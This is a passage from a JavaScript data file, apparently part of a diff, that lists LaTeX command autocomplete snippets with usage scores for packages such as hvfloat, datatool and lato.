'\\ifthenelse{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'erewhon-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'erewhon-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'erewhon-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'erewhon-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'erewhon-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'erewhon-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'erewhon-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'erewhon-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'erewhon-cmd', + score: 0.00014933999190577243, + }, + { + 
caption: '\\do', + snippet: '\\do', + meta: 'erewhon-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'erewhon-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'erewhon-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'erewhon-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'erewhon-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'erewhon-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'erewhon-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'erewhon-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'erewhon-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'erewhon-cmd', + score: 0.008565354665444157, + }, + ], + tgcursor: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgcursor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgcursor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgcursor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgcursor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgcursor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgcursor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgcursor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgcursor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgcursor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgcursor-cmd', + score: 0.021170869458413965, + }, + ], + ifvtex: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ifvtex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'ifvtex-cmd', + score: 0.002958865219480927, + }, + ], + memhfixc: [ + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'memhfixc-cmd', + score: 1.2569477427490174, + }, + ], + longfigure: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'longfigure-cmd', + score: 0.3277033727934986, + }, + ], + lato: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'lato-cmd', + score: 
0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'lato-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'lato-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'lato-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'lato-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'lato-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\scshape', + snippet: '\\scshape', + meta: 'lato-cmd', + score: 0.05364108855914402, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'lato-cmd', + score: 0.00037306820619479756, + }, + ], + authoraftertitle: [ + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'authoraftertitle-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'authoraftertitle-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'authoraftertitle-cmd', + score: 0.9202908262245683, + }, + ], + listofsymbols: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'listofsymbols-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'listofsymbols-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'listofsymbols-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'listofsymbols-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'listofsymbols-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'listofsymbols-cmd', + score: 0.0018957469739775527, + }, + ], + hvfloat: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hvfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hvfloat-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'hvfloat-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hvfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'hvfloat-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', 
+ snippet: '\\chapter{$1}', + meta: 'hvfloat-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hvfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'hvfloat-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'hvfloat-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'hvfloat-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'hvfloat-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'hvfloat-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hvfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hvfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'hvfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'hvfloat-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'hvfloat-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'hvfloat-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hvfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'hvfloat-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hvfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'hvfloat-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'hvfloat-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'hvfloat-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'hvfloat-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hvfloat-cmd', + 
score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hvfloat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hvfloat-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'hvfloat-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hvfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'hvfloat-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'hvfloat-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'hvfloat-cmd', + score: 0.021473212893597875, + }, + ], + thmbox: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thmbox-cmd', + score: 0.00037306820619479756, + }, + ], + proba: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'proba-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'proba-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'proba-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'proba-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'proba-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'proba-cmd', + score: 0.0006671850995492977, + }, + ], + datatool: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'datatool-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'datatool-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'datatool-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datatool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'datatool-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'datatool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'datatool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'datatool-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'datatool-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'datatool-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 
'datatool-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'datatool-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'datatool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'datatool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'datatool-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'datatool-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'datatool-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'datatool-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'datatool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'datatool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'datatool-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'datatool-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'datatool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'datatool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'datatool-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'datatool-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'datatool-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'datatool-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'datatool-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'datatool-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'datatool-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'datatool-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'datatool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'datatool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'datatool-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'datatool-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'datatool-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 
'datatool-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'datatool-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'datatool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'datatool-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'datatool-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'datatool-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'datatool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'datatool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'datatool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'datatool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'datatool-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'datatool-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'datatool-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'datatool-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'datatool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'datatool-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'datatool-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'datatool-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'datatool-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'datatool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'datatool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'datatool-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'datatool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'datatool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'datatool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'datatool-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'datatool-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'datatool-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + 
snippet: '\\prod', + meta: 'datatool-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'datatool-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'datatool-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'datatool-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'datatool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'datatool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'datatool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'datatool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'datatool-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'datatool-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'datatool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'datatool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'datatool-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'datatool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'datatool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'datatool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'datatool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'datatool-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'datatool-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'datatool-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'datatool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'datatool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'datatool-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'datatool-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'datatool-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'datatool-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'datatool-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'datatool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'datatool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'datatool-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + 
snippet: '\\max', + meta: 'datatool-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'datatool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'datatool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'datatool-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'datatool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'datatool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'datatool-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'datatool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'datatool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'datatool-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'datatool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'datatool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'datatool-cmd', + score: 